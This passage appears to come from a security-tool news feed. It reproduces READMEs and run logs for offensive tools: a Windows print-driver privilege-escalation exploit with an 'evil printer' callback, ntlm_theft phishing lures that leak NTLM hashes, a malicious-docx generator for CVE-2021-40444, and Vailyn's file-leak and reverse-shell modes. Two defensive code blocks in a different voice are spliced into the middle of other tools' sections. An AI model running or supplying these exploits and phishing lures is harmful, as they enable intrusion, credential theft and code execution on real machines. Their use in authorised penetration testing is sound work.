| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

And that's it, you'll see a new printer on your system:

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name                           ComputerName  Type   DriverName                 PortName       Shared  Published
----                           ------------  ----   ----------                 --------       ------  ---------
ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False
CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False
OneNote for Windows 10 Local Microsoft Software Pri... Microsoft.Of... False False
Microsoft XPS Document Writer Local Microsoft XPS Document... PORTPROMPT: False False
Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False
Fax Local Microsoft Shared Fax D... SHRFAX: False False


PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Note that there is one manual step that cp_server prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!

The process for using SLASHINGDAMAGE is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and then you'll still need to follow a couple of manual steps and reboot.


CP Client

The client is similarly easy to use. Let's look at its command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

CLI options:
-h, --help Display the help message
-r, --rhost arg The remote evil printer address
-n, --name arg The remote evil printer name
-e, --exploit arg The exploit to use
-l, --local No remote printer. Local attack only.
-d, --dll arg Path to user provided DLL to execute.

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE

First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.

cp_client has two modes: remote and local. The remote option is the most interesting because it adds the vulnerable driver to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:

  1. The exploit I want to use
  2. The evil printer IP address
  3. The name of the evil shared printer

Like this!

C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_ | ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

That's it! To execute a local only attack, you just need to provide the exploit:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Why doesn't the client have a SLASHINGDAMAGE option?

SLASHINGDAMAGE doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:

echo "evil.dll" "../../evil.dll" > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab

It's probably important to know that the version of SLASHINGDAMAGE in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.


Pull Requests and Bugs

Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.


Other things

One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).



Ntlm_Theft - A Tool For Generating Multiple Types Of NTLMv2 Hash Theft Files

17 September 2021 at 20:30
By: Zion3R


A tool for generating multiple types of NTLMv2 hash theft files.

ntlm_theft is an open source Python 3 tool that generates 21 different types of hash theft documents. These can be used for phishing when either the target allows SMB traffic outside their network, or if you are already inside the internal network.

The benefits of these file types over, say, macro-based documents or exploit documents are that all of these are built using "intended functionality". None were flagged by Windows Defender Antivirus as of June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.


ntlm_theft supports the following attack types:

  • Browse to Folder Containing
    • .url – via URL field
    • .url – via ICONFILE field
    • .lnk - via icon_location field
    • .scf – via ICONFILE field (Not Working on Latest Windows)
    • autorun.inf via OPEN field (Not Working on Latest Windows)
    • desktop.ini - via IconResource field (Not Working on Latest Windows)
  • Open Document
    • .xml – via Microsoft Word external stylesheet
    • .xml – via Microsoft Word includepicture field
    • .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
    • .docx – via Microsoft Word includepicture field
    • .docx – via Microsoft Word external template
    • .docx – via Microsoft Word frameset webSettings
    • .xlsx - via Microsoft Excel external cell
    • .wax - via Windows Media Player playlist (Better, primary open)
    • .asx – via Windows Media Player playlist (Better, primary open)
    • .m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
    • .jnlp – via Java external jar
    • .application – via any Browser (Must be served via a browser downloaded or won’t run)
  • Open Document and Accept Popup
    • .pdf – via Adobe Acrobat Reader
  • Click Link in Chat Program
    • .txt – formatted link to paste into Zoom chat

Use cases (why you want to run this)

ntlm_theft is primarily aimed at Penetration Testers and Red Teamers, who will use it to perform internal phishing on target company employees, or to mass test antivirus and email gateways. It may also be used for external phishing if outbound SMB access is allowed on the perimeter firewall.

I've found it useful while penetration testing to easily see what file types I have available to me, rather than spending time configuring a specific attack as would be used on red teaming engagements. You could send a .rtf or .docx file to the HR department, and a .xlsx spreadsheet doc to the finance department.


Getting Started

These instructions will show you the requirements for and how to use ntlm_theft.


Prerequisites

ntlm_theft requires Python3 and xlsxwriter:

pip3 install xlsxwriter

Required Parameters

To start up the tool 4 parameters must be provided, an input format, the input file or folder and the basic running mode:

-g, --generate : Choose to generate all files or a specific filetype
-s, --server   : The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)
-f, --filename : The base filename without extension, can be renamed later (eg: test, Board-Meeting2020, Bonus_Payment_Q4)

Example Runs

Here is an example of what a run looks like generating all files:

# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.

Here is an example of what a run looks like generating only modern files:

# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the latest versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.

Here is an example of what a run looks like generating only a xlsx file:

# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.

Authors
  • Jacob Wilkin - Research and Development

License

ntlm_theft Created by Jacob Wilkin Copyright (C) 2020 Jacob Wilkin

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.


Acknowledgments


On-The-Fly - Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)

17 September 2021 at 16:20
By: Zion3R



Different technologies and paradigms are hyperconnected and offer advances to society. The use of other technologies among these devices makes security uneven. When facing a pentest in any environment, one major factor is the network. The network interconnects the world of the Internet of Things, the world of industrial control systems, and information technology. This README introduces the 'on-the-fly' tool, which gives capabilities to perform pentesting tests in several domains (IoT, ICS & IT). It is an innovative tool in that it brings together different worlds sharing a common factor: the network.


Prerequisites

'on-the-fly' is written in Python and makes extensive use of Scapy and netfilterqueue. It is crucial to have Scapy and netfilterqueue installed for a compatible version of Python. For this, a Python 3 version up to 3.7.5 is recommended (and no higher, as some of the libraries 'on-the-fly' uses may be incompatible with 3.8 and 3.9). There is a requirements.txt file that must be installed the first time the tool is launched, using 'pip install -r requirements.txt'. Again, the pip version must correspond to a Python 3 version up to 3.7.5.

pip install -r requirements.txt

Usage
python on-the-fly.py

Example videos

on-the-fly: MySQL_manipulation Module


on-the-fly: SSDP_fake Module


on-the-fly: Proxy_socks4 Module


on-the-fly: Port_forwarding Module


on-the-fly: MDNS_Scan Module


Contact

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.

This software doesn't have a QA Process. This software is a Proof of Concept.

If you have any problems, you can contact:

[email protected]



DNSTake - A Fast Tool To Check Missing Hosted DNS Zones That Can Lead To Subdomain Takeover

16 September 2021 at 20:30
By: Zion3R


A fast tool to check missing hosted DNS zones that can lead to subdomain takeover.


What is a DNS takeover?

DNS takeover vulnerabilities occur when a subdomain (subdomain.example.com) or domain has its authoritative nameserver set to a provider (e.g. AWS Route 53, Akamai, Microsoft Azure, etc.) but the hosted zone has been removed or deleted. Consequently, when making a request for DNS records the server responds with a SERVFAIL error. This allows an attacker to create the missing hosted zone on the service that was being used and thus control all DNS records for that (sub)domain.¹


Installation

from Binary

The ez way! You can download a pre-built binary from releases page, just unpack and run!


from Source
NOTE: Go 1.16+ compiler should be installed & configured!

Very quick & clean!

▶ go install github.com/pwnesia/dnstake/cmd/[email protected]

— or

Manual building executable from source code:

▶ git clone https://github.com/pwnesia/dnstake
▶ cd dnstake/cmd/dnstake
▶ go build .
▶ (sudo) mv dnstake /usr/local/bin

Usage
$ dnstake -h


(c) pwnesia.org — v0.0.1

Usage:
[stdin] | dnstake [options]
dnstake -t HOSTNAME [options]

Options:
-t, --target <HOST/FILE> Define single target host/list to check
-c, --concurrent <i> Set the concurrency level (default: 25)
-s, --silent Suppress errors and/or clean output
-h, --help Display its help

Examples:
dnstake -t (sub.)domain.tld
dnstake -t hosts.txt
cat hosts.txt | dnstake
subfinder -silent -d domain.tld | dnstake

Workflow

DNSTake uses the RetryableDNS client library to send DNS queries. The initial lookup uses Google & Cloudflare DNS as resolvers, then checks and fingerprints the nameservers of the target host. If there is one, it resolves the target host again with its nameserver IPs as the resolver; if it gets an unexpected DNS status response (other than NOERROR/NXDOMAIN), the host is vulnerable to being taken over. More or less like this in the form of a diagram.

Currently supported DNS providers, see here.
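
The same three-step workflow is what a zone owner should run over their own inventory to catch delegations that outlive the hosted zone behind them. The block below is an added example, not DNSTake's code: it keeps the decision logic (public-resolver NS lookup, provider fingerprint, direct query of the delegated nameservers with NOERROR/NXDOMAIN as the healthy answers) and takes the lookups from a caller-supplied resolve() callable, so it runs offline; a production version would back that callable with dnspython. The provider suffixes, hostnames and answers in the fake resolver are constructed placeholders, not DNSTake's fingerprint list.

```python
"""Dangling-delegation check following the DNSTake workflow described above.

Added example, not DNSTake's code. Lookups go through a caller-supplied
resolve() callable so the decision logic runs offline; in production it
would be backed by dnspython queries. Provider suffixes, hostnames and
the answers in the fake resolver are constructed, not real fingerprints.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple

PUBLIC_RESOLVERS = ("8.8.8.8", "1.1.1.1")  # step 1: where the NS lookup goes

# step 2: nameserver suffix -> hosting provider (constructed placeholders)
PROVIDER_SUFFIXES: Dict[str, str] = {
    ".awsdns-example.": "Example Cloud DNS",
    ".dns-example.net.": "Example Managed DNS",
}

# resolve(qname, qtype, server) -> (rcode, answers)
Resolver = Callable[[str, str, str], Tuple[str, List[str]]]


@dataclass
class Verdict:
    host: str
    nameservers: List[str] = field(default_factory=list)
    provider: str = ""
    vulnerable: bool = False
    reason: str = ""


def fingerprint(ns: str) -> str:
    """Map a nameserver name to a known provider, or "" if unrecognised."""
    ns = ns.lower()
    for suffix, provider in PROVIDER_SUFFIXES.items():
        if ns.endswith(suffix):
            return provider
    return ""


def check_host(host: str, resolve: Resolver) -> Verdict:
    v = Verdict(host)
    # 1. Find the delegation via a public resolver.
    for server in PUBLIC_RESOLVERS:
        rcode, answers = resolve(host, "NS", server)
        if rcode == "NOERROR" and answers:
            v.nameservers = answers
            break
    if not v.nameservers:
        v.reason = "no NS delegation found"
        return v
    # 2. Fingerprint: only a zone at a provider where anyone can create
    #    zones can be re-registered by a third party.
    for ns in v.nameservers:
        v.provider = fingerprint(ns)
        if v.provider:
            break
    if not v.provider:
        v.reason = "nameservers not at a known provider"
        return v
    # 3. Ask the delegated nameservers themselves. NOERROR or NXDOMAIN means
    #    they serve the zone; REFUSED/SERVFAIL means the parent still points
    #    at a provider that has no zone for this name.
    for ns in v.nameservers:
        rcode, _ = resolve(host, "A", ns)
        if rcode in ("NOERROR", "NXDOMAIN"):
            v.reason = f"{ns} answered {rcode}: zone is hosted"
            return v
    v.vulnerable = True
    v.reason = "delegated nameservers do not serve the zone"
    return v


def fake_resolver() -> Resolver:
    """Constructed answers: one healthy delegation, one dangling, one self-hosted."""
    table = {
        ("healthy.example.com", "NS", "8.8.8.8"): ("NOERROR", ["ns1.awsdns-example."]),
        ("healthy.example.com", "A", "ns1.awsdns-example."): ("NOERROR", ["192.0.2.10"]),
        ("dangling.example.com", "NS", "8.8.8.8"): ("NOERROR", ["ns2.awsdns-example."]),
        ("dangling.example.com", "A", "ns2.awsdns-example."): ("REFUSED", []),
        ("selfhosted.example.com", "NS", "8.8.8.8"): ("NOERROR", ["ns.example.com."]),
    }
    return lambda q, t, s: table.get((q, t, s), ("SERVFAIL", []))


if __name__ == "__main__":
    for name in ("healthy.example.com", "dangling.example.com", "selfhosted.example.com"):
        print(check_host(name, fake_resolver()))
```

Step 3 is the one that matters for accuracy: a SERVFAIL from a public resolver alone is not proof, since it also appears on transient failures, so the verdict is only given after the delegated nameservers themselves decline to serve the zone. The fix on the owning side is to delete the stale NS records (or recreate the zone) before anyone else can register it.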


References

License

DNSTake is distributed under MIT. See LICENSE.



CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

16 September 2021 at 13:13
By: Zion3R


Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)


Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab


Using

First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

python3 exploit.py generate test/calc.dll http://<SRV IP>



Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80



Finally try the docx in a Windows Virtual Machine:



Plution - Prototype Pollution Scanner Using Headless Chrome

16 September 2021 at 11:30
By: Zion3R


Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: https://github.com/BlackFan/client-side-prototype-pollution/tree/master/pp


What this is not

This is not a one stop shop. Prototype pollution is a complicated beast. This tool does nothing you couldn't do manually. This is not a polished bug-free super tool. It is functional but poorly coded and to be considered alpha at best.


How it works

Plution appends a payload to the supplied URLs, navigates to each URL with headless Chrome and runs JavaScript on the page to verify whether a prototype was successfully polluted.


how it is used
  • Basic scan, output only to screen:
    cat URLs.txt | plution

  • Scan with a supplied payload rather than hardcoded one:
    cat URLs.txt|plution -p '__proto__.zzzc=example'
    Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

  • Output:
    Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

  • Concurrency:
    Pass the '-c' option to specify how many concurrent jobs are run (default is 5)


questions and answers
  • How do I install it?
    go get -u github.com/raverrr/plution

  • why specifically limit it to checking if window.zzzc is defined?
    zzzc is a short pattern that is unlikely to already be in a prototype. If you want more freedom in regards to the javascript use https://github.com/detectify/page-fetch instead

  • Got a more specific question?
    Ask me on twitter @divadbate.



Kali Linux 2021.3 - Penetration Testing and Ethical Hacking Linux Distribution

16 September 2021 at 03:00
By: Zion3R


Time for another Kali Linux release! – Kali Linux 2021.1. This release has various impressive updates.

A summary of the changes since the 2021.2 release from June are:

  • OpenSSL - Wide compatibility by default - Keep reading for what that means
  • New Kali-Tools site - Following the footsteps of Kali-Docs, Kali-Tools has had a complete refresh
  • Better VM support in the Live image session - Copy & paste and drag & drop from your machine into a Kali VM by default
  • New tools - From adversary emulation, to subdomain takeover to Wi-Fi attacks
  • Kali NetHunter smartwatch - first of its kind, for TicHunter Pro
  • KDE 5.21 - Plasma desktop received a version bump

Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python

15 September 2021 at 20:30
By: Zion3R


Vailyn


Phased Path Traversal & LFI Attacks

Vailyn 3.0

Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use --lfi to include them in the scan.


About

Vailyn is a multi-phased vulnerability analysis and exploitation tool for path traversal and file inclusion vulnerabilities. It is built to be as performant as possible and to offer a wide arsenal of filter evasion techniques.


How does it work?

Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd (or a user-specified file) with all of its evasive payloads. By analysing the responses, the payloads that worked are separated from the others.

Now, the user can choose freely which payloads to use. Only these payloads will be used in the second phase.

The second phase is the exploitation phase. Now, it tries to leak all possible files from the server using a file and a directory dictionary. The search depth and the directory permutation level can be adapted via arguments. Optionally, it can download found files, and save them in its loot folder. Alternatively, it will try to obtain a reverse shell on the system, letting the attacker gain full control over the server.

Right now, it supports multiple attack vectors: injection via query, path, cookie and POST data.
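
The Phase 1 probes described above (relative traversal, absolute paths, encoded variants, PHP wrappers) all target the same server-side mistake: joining user input onto a document root without validating the result. The following is an added example, not Vailyn's code, showing the vulnerable join beside a lookup that decodes the request, rejects wrapper schemes, absolute paths, NUL bytes and ".." segments, and then confirms the resolved file still sits under the canonical root. The sample requests and the throwaway document tree are constructed.

```python
"""Vulnerable and hardened file lookup for the download.php?file= pattern.

Added example, not Vailyn's code. naive_lookup() is the pattern a Phase 1
scan breaks with ../ payloads and absolute paths; safe_lookup() rejects the
same inputs explicitly. Sample requests and the document tree are constructed.
"""
import os
import posixpath
import tempfile
from typing import Dict, Tuple
from urllib.parse import unquote


def naive_lookup(root: str, requested: str) -> str:
    # Vulnerable: "../" walks out of root, and an absolute requested path
    # replaces root entirely (os.path.join("/srv/www", "/etc/passwd")).
    return os.path.join(root, requested)


def safe_lookup(root: str, requested: str) -> str:
    """Return the real path of `requested` under `root`, or raise ValueError."""
    # 1. Decode repeatedly so %2e%2e%2f and double encodings collapse.
    decoded = requested
    for _ in range(3):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    # 2. Wrapper schemes (php://, data://, expect://) never name a file under root.
    if ":" in decoded.split("/", 1)[0]:
        raise ValueError("scheme not allowed")
    # 3. A NUL byte would truncate the path in C-level APIs.
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # 4. Treat backslashes as separators, then reject absolute paths and ".."
    #    segments instead of silently normalising them away.
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):
        raise ValueError("absolute path not allowed")
    if any(seg == ".." for seg in decoded.split("/")):
        raise ValueError("parent traversal not allowed")
    # 5. Canonicalise (collapses "." and "//"), follow symlinks, and check
    #    containment against the canonical root.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, posixpath.normpath(decoded)))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("path escapes document root")
    if not os.path.isfile(candidate):
        raise ValueError("no such file")
    return candidate


# Constructed requests: two legitimate, the rest shaped like traversal probes.
SAMPLE_REQUESTS = (
    "docs/report.txt",
    "docs/./report.txt",
    "../../../etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",
    "%252e%252e/etc/passwd",
    "docs/..%5c..%5cetc/passwd",
    "/etc/passwd",
    "php://filter/convert.base64-encode/resource=index.php",
    "docs/report.txt%00.jpg",
    "....//....//etc/passwd",
)


def demo() -> Dict[str, Tuple[str, str]]:
    """Build a throwaway document root and run safe_lookup over the samples."""
    root = tempfile.mkdtemp(prefix="docroot-")
    os.mkdir(os.path.join(root, "docs"))
    with open(os.path.join(root, "docs", "report.txt"), "w") as fh:
        fh.write("quarterly report\n")
    results = {}
    for req in SAMPLE_REQUESTS:
        try:
            results[req] = ("ok", safe_lookup(root, req))
        except ValueError as exc:
            results[req] = ("rejected", str(exc))
    return results


if __name__ == "__main__":
    for req, (status, detail) in demo().items():
        print(f"{status:9} {req!r:58} {detail}")
```

Rejecting ".." outright rather than normalising it is deliberate: a request that needed normalising was never a legitimate one, and an explicit rejection is what you want to see in the access log when a scanner like Vailyn runs through its payload list. The containment check on the real path is still needed because symlinks inside the root can point outside it.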


Why the phase separation?

The separation into several phases is done to hugely improve the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead, because payloads were tried again and again despite not working for the current page.


Installation

Recommended & tested Python versions are 3.7+, but it should work fine with Python 3.5 & Python 3.6, too. To install Vailyn, download the archive from the release tab, or perform

$ git clone https://github.com/VainlyStrain/Vailyn

Once on your system, you'll need to install the Python dependencies.


Unix Systems

On Unix systems, it is sufficient to run

$ pip install -r requirements.txt   # --user

Windows

Some libraries Vailyn uses do not work well with Windows, or will fail to install.

If you use Windows, use pip to install the requirements listed in Vailyn\·›\requirements-windows.txt.

If twisted fails to install, there is an unofficial version available here, which should build under Windows. Just bear in mind that this is a 3rd party download, and its integrity isn't necessarily guaranteed. After this has installed successfully, running pip again on requirements-windows.txt should work.


Final Steps

If you want to fully use the reverse shell module, you'll need to have sshpass, ncat and konsole installed. Package names vary by Linux distribution. On Windows, you'll need to start the listener manually beforehand. If you don't like konsole, you can specify a different terminal emulator in core/config.py.

That's it! Fire Vailyn up by moving to its installation directory and performing

$ python Vailyn -h

Usage

Vailyn has 3 mandatory arguments: -v VIC, -a INT and -p2 TP P1 P2. However, depending on -a, more arguments may be required.


Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2
[-p PAM] [-i F] [-Pi VIC2]
[-c C] [-n] [-d I J K]
[-s T] [-t] [-L]
[-l] [-P] [-A]

mandatory:
-v VIC, --victim VIC Target to attack, part 1 [pre-payload]
-a INT, --attack INT Attack type (int, 1-5, or A)
A| Spider (all) 2| Path 5| POST Data, json
P| Spider (partial) 3| Cookie
1| Query Parameter 4| POST Data, plain

-p2 TP P1 P2, --phase2 TP P1 P2
Attack in Phase 2, and needed parameters

┌[ Values ]─────────────┬────────────────────┐
│ TP      │ P1          │ P2                 │
├─────────┼─────────────┼────────────────────┤
│ leak    │ File Dict   │ Directory Dict     │
│ inject  │ IP Addr     │ Listening Port     │
│ implant │ Source File │ Server Destination │
└─────────┴─────────────┴────────────────────┘

additional:
-p PAM, --param PAM query parameter or POST data for --attack 1, 4, 5
-i F, --check F File to check for in Phase 1 (df: etc/passwd)
-Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload]
-c C, --cookie C Cookie to append (in header format)
-l, --loot Download found files into the loot folder
-d I J K, --depths I J K
depths (I: phase 1, J: phase 2, K: permutation level )
-h, --help show this help menu and exit
-s T, --timeout T Request Timeout; stable switch for Arjun
-t, --tor Pipe attacks through the Tor anonymity network
-L, --lfi Additionally use PHP wrappers to leak files
-n, --nosploit skip Phase 2 (does not need -p2 TP P1 P2)
-P, --precise Use exact depth in Phase 1 (not a range)
-A, --app Start Vailyn's Qt5 interface

develop:
--debug Display every path tried, even 404s.
--version Print program version and exit.
--notmain Avoid notify2 crash in subprocess call.

Info:
to leak files using absolute paths: -d 0 0 0
to get a shell using absolute paths: -d 0 X 0

